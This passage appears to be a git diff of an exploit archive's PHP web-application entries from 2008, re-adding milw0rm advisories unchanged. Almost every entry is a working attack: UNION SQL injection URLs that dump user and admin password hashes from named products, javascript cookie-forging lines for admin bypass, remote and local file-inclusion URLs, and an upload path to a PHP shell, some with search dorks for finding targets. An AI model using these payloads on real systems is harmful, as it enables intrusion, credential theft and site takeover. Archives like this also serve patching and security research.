http://[Target]/[212cafeboard]/view.php?qID=[SQL Injection] - - ------- - POC ------- - -[+] http://[Target]/[212cafeboard]/view.php?qID=-9999')/**/UNION/**/SELECT/**/1,concat(mUser,0x3a3a,mPasswd),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/board_member/**/WHERE/**/(mID='1 - - -##################################################################### -Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos -Special Thx : asylu3, str0ke, citec.us, milw0rm.com -##################################################################### - -# milw0rm.com [2008-09-26] +=================================================================== + 212cafe Board (view.php qID) Remote SQL Injection Vulnerability +=================================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. 
CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + +AUTHOR : CWH Underground +DATE : 26 September 2008 +SITE : cwh.citec.us + + +##################################################### +APPLICATION : 212cafe Board +VERSION : 0.07 +VENDOR : http://www.212cafe.com/ +DOWNLOAD : http://php.deeserver.net/download/get/12/212cafeboard_v0_07.zip +##################################################### + +--- Remote SQL Injection --- + +** Magic Quote must turn off ** + +----------------------------------- + Vulnerable File (view.php) +----------------------------------- + +$query="SELECT * FROM board_question WHERE (qID='$qID')"; + +--------- + Exploit +--------- + +[+] http://[Target]/[212cafeboard]/view.php?qID=[SQL Injection] + + +------ + POC +------ + +[+] http://[Target]/[212cafeboard]/view.php?qID=-9999')/**/UNION/**/SELECT/**/1,concat(mUser,0x3a3a,mPasswd),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/board_member/**/WHERE/**/(mID='1 + + +##################################################################### +Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos +Special Thx : asylu3, str0ke, citec.us, milw0rm.com +##################################################################### + +# milw0rm.com [2008-09-26] diff --git a/platforms/php/webapps/6579.txt b/platforms/php/webapps/6579.txt index a96c72725..9d43f3a6e 100755 --- a/platforms/php/webapps/6579.txt +++ b/platforms/php/webapps/6579.txt 
@@ -1,10 +1,10 @@
-###############################################################################################
-[+] Libra PHP File Manager Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack
-[+] Greetz : All my freind
-################################################################################################
----
-exploit:
-javascript:document.cookie = "user=1; path=/"; document.cookie = "pass=1; path=/";
-
-# milw0rm.com [2008-09-26]
+###############################################################################################
+[+] Libra PHP File Manager Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack
+[+] Greetz : All my freind
+################################################################################################
+---
+exploit:
+javascript:document.cookie = "user=1; path=/"; document.cookie = "pass=1; path=/";
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6580.txt b/platforms/php/webapps/6580.txt
index 92cd91083..810795c75 100755
--- a/platforms/php/webapps/6580.txt
+++ b/platforms/php/webapps/6580.txt
@@ -1,9 +1,9 @@
-###############################################################################################
-[+] Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack
-[+] Greetz : All my freind
-################################################################################################
-javascript:document.cookie = "apa_cookie_login=foo; path=/;";
-javascript:document.cookie = "apa_cookie_password=bar; path=/;";
-
-# milw0rm.com [2008-09-26]
+###############################################################################################
+[+] Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack
+[+] Greetz : All my freind
+################################################################################################
+javascript:document.cookie = "apa_cookie_login=foo; path=/;";
+javascript:document.cookie = "apa_cookie_password=bar; path=/;";
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6583.txt b/platforms/php/webapps/6583.txt
index 59afb433d..b7477556e 100755
--- a/platforms/php/webapps/6583.txt
+++ b/platforms/php/webapps/6583.txt
@@ -1,35 +1,35 @@ -[~] Esqlanelapse Software Project -[~] -[~] version: 2.6.1 & 2.6.2 -[~] -[~] Insecure Cookie Handling Vulnerability -[~] -[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=118575&package_id=129141&release_id=519061 -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 26.09.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] contact: zorlu@w.cn -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] ----------------------------------------------------------- - -Exploit: - -javascript:document.cookie = "enombre=nombre; path=/"; document.cookie = "euri=visitor_uri; path=/"; - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs -[~] -[~] yildirimordulari.org & r00tsecurity.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-09-26] +[~] Esqlanelapse Software Project +[~] +[~] version: 2.6.1 & 2.6.2 +[~] +[~] Insecure Cookie Handling Vulnerability +[~] +[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=118575&package_id=129141&release_id=519061 +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 26.09.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] contact: zorlu@w.cn +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] ----------------------------------------------------------- + +Exploit: + +javascript:document.cookie = "enombre=nombre; path=/"; document.cookie = "euri=visitor_uri; path=/"; + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs +[~] +[~] 
yildirimordulari.org & r00tsecurity.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-09-26] diff --git a/platforms/php/webapps/6584.txt b/platforms/php/webapps/6584.txt index af70cd123..bd96487e3 100755 --- a/platforms/php/webapps/6584.txt +++ b/platforms/php/webapps/6584.txt 
@@ -1,63 +1,63 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -The Gemini Portal <= 4.7 / Insecure Cookie Handling Vulnerability --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -Program: The Gemini Portal -Version: <= 4.7 -File affected: admin/* -Download: http://www.arzdev.com/downloads/1/Gemini - - -Found by Pepelux -eNYe-Sec - www.enye-sec.org - - ->> Program description (by the author website) << - -The Gemini Portal 4 is the most scalable, dynamic, and powerful content -management system there is. It is perfect for large business network services, -to the simple personal web site for use with PHP and MySQL.', 'The Gemini -Portal is a dynamic content management system. It is ideal for any size -community, allowing users, moderators, limited admins, and global admins log -in. Many of the built in pages use the dynamic database file system (ArzFS) -to manipulate files and folders. - - ->> Bug << - -You can access to the admin panel altering the cookie and adding a parameter -in the navigation bar. - - ->> Exploit << - -Note: POST is not checked and you can enter all by GET. Also you can create a -simple perl script to send GET and POST packages. - -First step: javascript:document.cookie = "user=admin" - -Second step: navigate by the admin panel adding the parameter '&name=users' in -the navigation bar. 
Examples: - - to view the main admin panel: - http://site/admin.php?page=main&name=users - - to list all forums: - http://site/admin.php?page=forums&name=users - - to post a new forum: - http://site/admin.php?page=forums&name=users&page=forums&op=newf&fview=Everyone&fpost=Everyone&forumname=WHAT_YOU_WANT&descrip=WHAT_YOU_WANT - - to list articles: - http://site/admin.php?page=articles&name=users - - to create a new article: - http://site/admin.php?page=articles&name=users&op=newd&dtitle=WHAT_YOU_WANT&ppcontent=WHAT_YOU_WANT&dfolder=0&category=1&autor=admin - - to list all users: - http://site/admin.php?page=users&name=users - - to edit the admin profile (you can change the admin password) - http://site/admin.php?page=users&op=edi&uid=2&name=users - -# milw0rm.com [2008-09-26] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +The Gemini Portal <= 4.7 / Insecure Cookie Handling Vulnerability +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +Program: The Gemini Portal +Version: <= 4.7 +File affected: admin/* +Download: http://www.arzdev.com/downloads/1/Gemini + + +Found by Pepelux +eNYe-Sec - www.enye-sec.org + + +>> Program description (by the author website) << + +The Gemini Portal 4 is the most scalable, dynamic, and powerful content +management system there is. It is perfect for large business network services, +to the simple personal web site for use with PHP and MySQL.', 'The Gemini +Portal is a dynamic content management system. It is ideal for any size +community, allowing users, moderators, limited admins, and global admins log +in. Many of the built in pages use the dynamic database file system (ArzFS) +to manipulate files and folders. + + +>> Bug << + +You can access to the admin panel altering the cookie and adding a parameter +in the navigation bar. + + +>> Exploit << + +Note: POST is not checked and you can enter all by GET. Also you can create a +simple perl script to send GET and POST packages. 
+ +First step: javascript:document.cookie = "user=admin" + +Second step: navigate by the admin panel adding the parameter '&name=users' in +the navigation bar. Examples: + + to view the main admin panel: + http://site/admin.php?page=main&name=users + + to list all forums: + http://site/admin.php?page=forums&name=users + + to post a new forum: + http://site/admin.php?page=forums&name=users&page=forums&op=newf&fview=Everyone&fpost=Everyone&forumname=WHAT_YOU_WANT&descrip=WHAT_YOU_WANT + + to list articles: + http://site/admin.php?page=articles&name=users + + to create a new article: + http://site/admin.php?page=articles&name=users&op=newd&dtitle=WHAT_YOU_WANT&ppcontent=WHAT_YOU_WANT&dfolder=0&category=1&autor=admin + + to list all users: + http://site/admin.php?page=users&name=users + + to edit the admin profile (you can change the admin password) + http://site/admin.php?page=users&op=edi&uid=2&name=users + +# milw0rm.com [2008-09-26] diff --git a/platforms/php/webapps/6585.txt b/platforms/php/webapps/6585.txt index d05a319ad..cff52db04 100755 --- a/platforms/php/webapps/6585.txt +++ b/platforms/php/webapps/6585.txt 
@@ -1,26 +1,26 @@ -************************************************************************************** - -Author : By Crackers_Child -Contact: cashr00t@hotmail.com -Greetz : str0ke & All My Friends - -************************************************************************************** -Script : openEngine 2. 0 beta2 Remote File include Vulnerable -Download :http://downloads.sourceforge.net/openengine/openengine20_beta2.zip?modtime=1203083918&big_mirror=0 - -************************************************************************************** - -Exploit : Site.com/script_path/cms/classes/openengine/filepool.php?oe_classpath=Shellz? - - -************************************************************************************** - -Vulberable : include($oe_classpath."/openengine/thumbnail.php"); (filepool.php) - - -************************************************************************************** - -N0te : Mubarek Ramazan Bayraminiz Kutlu Olsun Ey Musluman Halki :) -************************************************************************************** - -# milw0rm.com [2008-09-26] +************************************************************************************** + +Author : By Crackers_Child +Contact: cashr00t@hotmail.com +Greetz : str0ke & All My Friends + +************************************************************************************** +Script : openEngine 2. 0 beta2 Remote File include Vulnerable +Download :http://downloads.sourceforge.net/openengine/openengine20_beta2.zip?modtime=1203083918&big_mirror=0 + +************************************************************************************** + +Exploit : Site.com/script_path/cms/classes/openengine/filepool.php?oe_classpath=Shellz? 
+ + +************************************************************************************** + +Vulberable : include($oe_classpath."/openengine/thumbnail.php"); (filepool.php) + + +************************************************************************************** + +N0te : Mubarek Ramazan Bayraminiz Kutlu Olsun Ey Musluman Halki :) +************************************************************************************** + +# milw0rm.com [2008-09-26] diff --git a/platforms/php/webapps/6586.txt b/platforms/php/webapps/6586.txt index 025d4850f..a90b0bfa1 100755 --- a/platforms/php/webapps/6586.txt +++ b/platforms/php/webapps/6586.txt 
@@ -1,42 +1,42 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -Crux Gallery <= 1.32 / Insecure Cookie Handling Vulnerability --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -Program: Crux Gallery -Version: <= 1,32 -File affected: admin/* -Download: http://www.arzdev.com/downloads/8/Crux - - -Found by Pepelux -eNYe-Sec - www.enye-sec.org - - ->> Program description (by the author website) << - -Crux Gallery reads directories on a server and listes them with thumbnails for -the user to view without useing exrta space for thumbnails or extra bandwidth -for full images. Each image has other resolutions near them for the user to -choose from, including the origional resolution the image is in. - ->> Bug << - -You can access to the admin panel altering the cookie and adding a parameter -in the navigation bar. - - ->> Exploit << - -Note: POST is not checked and you can enter all by GET. Also you can create a -simple perl script to send GET and POST packages. - -Navigate by the admin panel adding the parameter '&name=users' in the -navigation bar. Examples: - - to view the main admin panel: - http://site/index.php?op=admin&name=users - - to change the admin password: - http://site/index.php?op=pass&name=users - -# milw0rm.com [2008-09-26] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +Crux Gallery <= 1.32 / Insecure Cookie Handling Vulnerability +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +Program: Crux Gallery +Version: <= 1,32 +File affected: admin/* +Download: http://www.arzdev.com/downloads/8/Crux + + +Found by Pepelux +eNYe-Sec - www.enye-sec.org + + +>> Program description (by the author website) << + +Crux Gallery reads directories on a server and listes them with thumbnails for +the user to view without useing exrta space for thumbnails or extra bandwidth +for full images. 
Each image has other resolutions near them for the user to +choose from, including the origional resolution the image is in. + +>> Bug << + +You can access to the admin panel altering the cookie and adding a parameter +in the navigation bar. + + +>> Exploit << + +Note: POST is not checked and you can enter all by GET. Also you can create a +simple perl script to send GET and POST packages. + +Navigate by the admin panel adding the parameter '&name=users' in the +navigation bar. Examples: + + to view the main admin panel: + http://site/index.php?op=admin&name=users + + to change the admin password: + http://site/index.php?op=pass&name=users + +# milw0rm.com [2008-09-26] diff --git a/platforms/php/webapps/6587.txt b/platforms/php/webapps/6587.txt index cfb7cc6d0..0d54a5bd3 100755 --- a/platforms/php/webapps/6587.txt +++ b/platforms/php/webapps/6587.txt 
@@ -1,48 +1,48 @@ -[~] The Gemini Portal Multiple Remote File inj. -[~] -[~] version: 4.7 -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 26.09.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] contact: zorlu@w.cn -[~] -[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...! -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] ----------------------------------------------------------- - -file 1: gemini/page/forums/bottom.php - -c0de: - -include($lang); (line16) - -Exploit 1: - -http://localhost/script_path/gemini/page/forums/bottom.php?lang=ZoRLu.txt? - -file 2: gemini/page/forums/category.php - -c0de: - -include($lang); (line 17) - -Exploit 2: - -http://localhost/script_path/gemini/page/forums/category.php?lang=ZoRLu.txt? - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs -[~] -[~] yildirimordulari.org & r00tsecurity.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-09-26] +[~] The Gemini Portal Multiple Remote File inj. +[~] +[~] version: 4.7 +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 26.09.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] contact: zorlu@w.cn +[~] +[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...! +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] ----------------------------------------------------------- + +file 1: gemini/page/forums/bottom.php + +c0de: + +include($lang); (line16) + +Exploit 1: + +http://localhost/script_path/gemini/page/forums/bottom.php?lang=ZoRLu.txt? 
+ +file 2: gemini/page/forums/category.php + +c0de: + +include($lang); (line 17) + +Exploit 2: + +http://localhost/script_path/gemini/page/forums/category.php?lang=ZoRLu.txt? + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs +[~] +[~] yildirimordulari.org & r00tsecurity.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-09-26] diff --git a/platforms/php/webapps/6589.txt b/platforms/php/webapps/6589.txt index 65f152a42..cc68428cd 100755 --- a/platforms/php/webapps/6589.txt +++ b/platforms/php/webapps/6589.txt 
@@ -1,31 +1,31 @@ - _____ ____ _____ ____ _____ __ __ _____ ____ - / _ \ /\ /\ / _ \ / _ \ / ___| / _ \ / \/ \ / _ \ / _ | - | | | | \ \/ / ||_| | | | | | | | | | | | | \__/ | | |_| | ||_|_| - | | | | \ / \__ | | | | | | | | | | | | | | | | _ | | \ - | |_| | / \ __| | | |_| |/\| |__ | |_| | | | | |/\| | | | | |\ \ - \_____/ / /\ \ |____/ \_____/\/\____| \_____/ |_| |_|\/|_| |_| |_| \_| - \/ \/ - -[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection - -[~] Author: 0x90 - -[~] HomePage: www.0x90.com.ar - -[~] Contact: Guns[at]0x90[dot]com[dot]ar - -[~] Script: RPG.Board - -[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69 - -[~] Vulnerability Class: SQL Injection - - - -[~] Exploit: - -Register, login and testing exploit.. - -http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]userlogin - -# milw0rm.com [2008-09-26] + _____ ____ _____ ____ _____ __ __ _____ ____ + / _ \ /\ /\ / _ \ / _ \ / ___| / _ \ / \/ \ / _ \ / _ | + | | | | \ \/ / ||_| | | | | | | | | | | | | \__/ | | |_| | ||_|_| + | | | | \ / \__ | | | | | | | | | | | | | | | | _ | | \ + | |_| | / \ __| | | |_| |/\| |__ | |_| | | | | |/\| | | | | |\ \ + \_____/ / /\ \ |____/ \_____/\/\____| \_____/ |_| |_|\/|_| |_| |_| \_| + \/ \/ + +[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection + +[~] Author: 0x90 + +[~] HomePage: www.0x90.com.ar + +[~] Contact: Guns[at]0x90[dot]com[dot]ar + +[~] Script: RPG.Board + +[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69 + +[~] Vulnerability Class: SQL Injection + + + +[~] Exploit: + +Register, login and testing exploit.. + +http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]userlogin + +# milw0rm.com [2008-09-26] diff --git a/platforms/php/webapps/6590.txt b/platforms/php/webapps/6590.txt index 386edc497..e4f63be5c 100755 --- a/platforms/php/webapps/6590.txt +++ b/platforms/php/webapps/6590.txt 
@@ -1,13 +1,13 @@ -Dork - content_by_cat.asp?contentid ''catid'' - -Exploit : - -content_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users - -Exploit 2 : - -content_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users - -DownLoad Site : http://camyuva.bel.tr/who.php - -# milw0rm.com [2008-09-27] +Dork - content_by_cat.asp?contentid ''catid'' + +Exploit : + +content_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users + +Exploit 2 : + +content_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users + +DownLoad Site : http://camyuva.bel.tr/who.php + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6591.txt b/platforms/php/webapps/6591.txt index 8d7d61a0c..776480b18 100755 --- a/platforms/php/webapps/6591.txt +++ b/platforms/php/webapps/6591.txt @@ -1,9 +1,9 @@ -############################################################################################### -[+] RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling Vulnerability -[+] Discovered By Stack -[+] Greetz : All my freind -################################################################################################ -Exploit: -javascript:document.cookie = "keep4u=l5_ZrX8; path=/;"; - -# milw0rm.com [2008-09-27] +############################################################################################### +[+] RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling Vulnerability +[+] Discovered By Stack +[+] Greetz : All my freind +################################################################################################ +Exploit: +javascript:document.cookie = "keep4u=l5_ZrX8; path=/;"; + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6592.txt b/platforms/php/webapps/6592.txt index 3da37953b..d610dd811 100755 
--- a/platforms/php/webapps/6592.txt +++ b/platforms/php/webapps/6592.txt @@ -1,47 +1,47 @@ -==================================================================== - - - [o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability - - Software : X7 Chat version 2.0.5.1 - Vendor : http://x7chat.com/ - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - - -==================================================================== - - - [o] Vulnerable file - - help/mini.php - - include("./help/{$_GET['help_file']}"); - - - - [o] Exploit - - http://localhost/[path]/help/mini.php?help_file=[LFI]%00 - - - - [o] Dork - - "powered by x7 chat" - - -==================================================================== - - - [o] Greetz - - MainHack BrotherHood [ www.mainhack.com ] - VOP Crew [ Vaksin13 OoN_BoY Paman ] - H312Y yooogy mousekill }^-^{ k1tk4t - skulmatic olibekas ulga Cungkee str0ke - - -==================================================================== - -# milw0rm.com [2008-09-27] +==================================================================== + + + [o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability + + Software : X7 Chat version 2.0.5.1 + Vendor : http://x7chat.com/ + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + + +==================================================================== + + + [o] Vulnerable file + + help/mini.php + + include("./help/{$_GET['help_file']}"); + + + + [o] Exploit + + http://localhost/[path]/help/mini.php?help_file=[LFI]%00 + + + + [o] Dork + + "powered by x7 chat" + + +==================================================================== + + + [o] Greetz + + MainHack BrotherHood [ www.mainhack.com ] + VOP Crew [ Vaksin13 OoN_BoY Paman ] + H312Y yooogy mousekill }^-^{ k1tk4t + skulmatic olibekas ulga Cungkee str0ke + + +==================================================================== + +# milw0rm.com [2008-09-27] 
diff --git a/platforms/php/webapps/6593.txt b/platforms/php/webapps/6593.txt
index c550404dc..0928f0044 100755
--- a/platforms/php/webapps/6593.txt
+++ b/platforms/php/webapps/6593.txt
@@ -1,28 +1,28 @@ -####################################################################### -# -# Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability -# -####################################################################### - -# Bug discovered by elusiven -# It was priv8 - -Bug: - -[Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user-- - -or: - -[Target]/[Path]/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user-- - -# Special gr33tz for: my sweet Monia :* -# gr33tz for: artii2, GrZyB997, Sp!riT, Msb, Adish, Mandr4ke, eXc!t3, aqtyq, tescik2, stranger, Voldo, KrafT, -# DonJapkO, Gaara, br0wdz, uncalled, cOndemned aka f60.1, zbt, matisto, pr0metheus and all gd pplz from the underground. - -################################################# -# -# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION -# -################################################# - -# milw0rm.com [2008-09-27] +####################################################################### +# +# Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability +# +####################################################################### + +# Bug discovered by elusiven +# It was priv8 + +Bug: + +[Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user-- + +or: + +[Target]/[Path]/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user-- + +# Special gr33tz for: my sweet Monia :* +# gr33tz for: artii2, GrZyB997, Sp!riT, Msb, Adish, Mandr4ke, eXc!t3, aqtyq, tescik2, stranger, Voldo, KrafT, +# DonJapkO, Gaara, br0wdz, uncalled, cOndemned aka f60.1, zbt, matisto, pr0metheus and all gd pplz from the underground. 
+ +################################################# +# +# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION +# +################################################# + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6594.txt b/platforms/php/webapps/6594.txt index 834fddc6d..aab8e7564 100755 --- a/platforms/php/webapps/6594.txt +++ b/platforms/php/webapps/6594.txt @@ -1,18 +1,18 @@ -[+] CameraLife-2.6.2b4 Arbitrary File Upload Vulnerability - -[+] Author:Mi4night - -[+] Version:cameralife-2.6.2b4 - -[+] Download Script: -[+] http://sourceforge.net/project/showfiles.php?group_id=70910&package_id=70316&release_id=628868 - -[+] Exploit: -[+] http://127.0.0.1/cameralife/images/photos/upload/Mi4night/yourshell.php - -[+] Description: -[+] After registering you can upload php files which you can access just like in the exploit section! Change Mi4night with your username. - -[+] Greets to : nuclear, cAs,zYzTeM, Sys32-Hack, Pepe, G-Emp!RE, ThaWhiteNigga, *Z.i.P*,THE_MAN, I-O-W-A, Digitalfortress, DiGitalX, sys32r, pentest, Pig, d3v1l, watchdog, Gibon - -# milw0rm.com [2008-09-27] +[+] CameraLife-2.6.2b4 Arbitrary File Upload Vulnerability + +[+] Author:Mi4night + +[+] Version:cameralife-2.6.2b4 + +[+] Download Script: +[+] http://sourceforge.net/project/showfiles.php?group_id=70910&package_id=70316&release_id=628868 + +[+] Exploit: +[+] http://127.0.0.1/cameralife/images/photos/upload/Mi4night/yourshell.php + +[+] Description: +[+] After registering you can upload php files which you can access just like in the exploit section! Change Mi4night with your username. + +[+] Greets to : nuclear, cAs,zYzTeM, Sys32-Hack, Pepe, G-Emp!RE, ThaWhiteNigga, *Z.i.P*,THE_MAN, I-O-W-A, Digitalfortress, DiGitalX, sys32r, pentest, Pig, d3v1l, watchdog, Gibon + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6595.txt b/platforms/php/webapps/6595.txt index 870c33b4e..b02a8dfb9 100755 --- a/platforms/php/webapps/6595.txt +++ b/platforms/php/webapps/6595.txt 
@@ -1,48 +1,48 @@ -Joovili <= 3.0 SQL Injection Vulnerability - -Author: ~!Dok_tOR!~ -Date found: 27.08.08 -Product: Joovili -Version: 3.0 -Price: $155 -URL: www.joovili.com -Download script: http://rapidshare.com/files/96178834/Joovili.Patch.3.0.1__2.Themes.WST.rar.html -Vulnerability Class: SQL Injection -Condition: magic_quotes_gpc = Off - -http://localhost/[installdir]/search.php - -Search Music: - -Exploit 1: - -'+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8+from+joovili_users/* - -Exploit 2: - -'+union+select+1,2,3,concat_ws(0x3a,admin_username,admin_password),5,6,7,8+from+joovili_admins/* - - -Exploit 1: - -http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a,username,password),user(),version(),6+from+joovili_users/* - -Exploit 2: - -http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),user(),version(),6+from+joovili_admins/* - -Exploit 1: - -http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_users/* - -Exploit 2: - -http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_admins/* - - -http://localhost/[installdir]/view.group.php?id='+union+select+1,2,user(),4,5,6,7,8,9/* -http://localhost/[installdir]/view.music.php?id='+union+select+1,2,3,version(),5,6,7,8/* -http://localhost/[installdir]/view.picture.php?id='+union+select+1,user(),3,4,5,6,7/* -http://localhost/[installdir]/view.video.php?id='+union+select+1,2,3,user(),5,6,7,8/* - -# milw0rm.com [2008-09-27] +Joovili <= 3.0 SQL Injection Vulnerability + +Author: ~!Dok_tOR!~ +Date found: 27.08.08 +Product: Joovili +Version: 3.0 +Price: $155 +URL: www.joovili.com +Download script: http://rapidshare.com/files/96178834/Joovili.Patch.3.0.1__2.Themes.WST.rar.html +Vulnerability Class: SQL Injection +Condition: 
magic_quotes_gpc = Off + +http://localhost/[installdir]/search.php + +Search Music: + +Exploit 1: + +'+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8+from+joovili_users/* + +Exploit 2: + +'+union+select+1,2,3,concat_ws(0x3a,admin_username,admin_password),5,6,7,8+from+joovili_admins/* + + +Exploit 1: + +http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a,username,password),user(),version(),6+from+joovili_users/* + +Exploit 2: + +http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),user(),version(),6+from+joovili_admins/* + +Exploit 1: + +http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_users/* + +Exploit 2: + +http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_admins/* + + +http://localhost/[installdir]/view.group.php?id='+union+select+1,2,user(),4,5,6,7,8,9/* +http://localhost/[installdir]/view.music.php?id='+union+select+1,2,3,version(),5,6,7,8/* +http://localhost/[installdir]/view.picture.php?id='+union+select+1,user(),3,4,5,6,7/* +http://localhost/[installdir]/view.video.php?id='+union+select+1,2,3,user(),5,6,7,8/* + +# milw0rm.com [2008-09-27] diff --git a/platforms/php/webapps/6596.txt b/platforms/php/webapps/6596.txt index 6378d691a..a4642f8ab 100755 --- a/platforms/php/webapps/6596.txt +++ 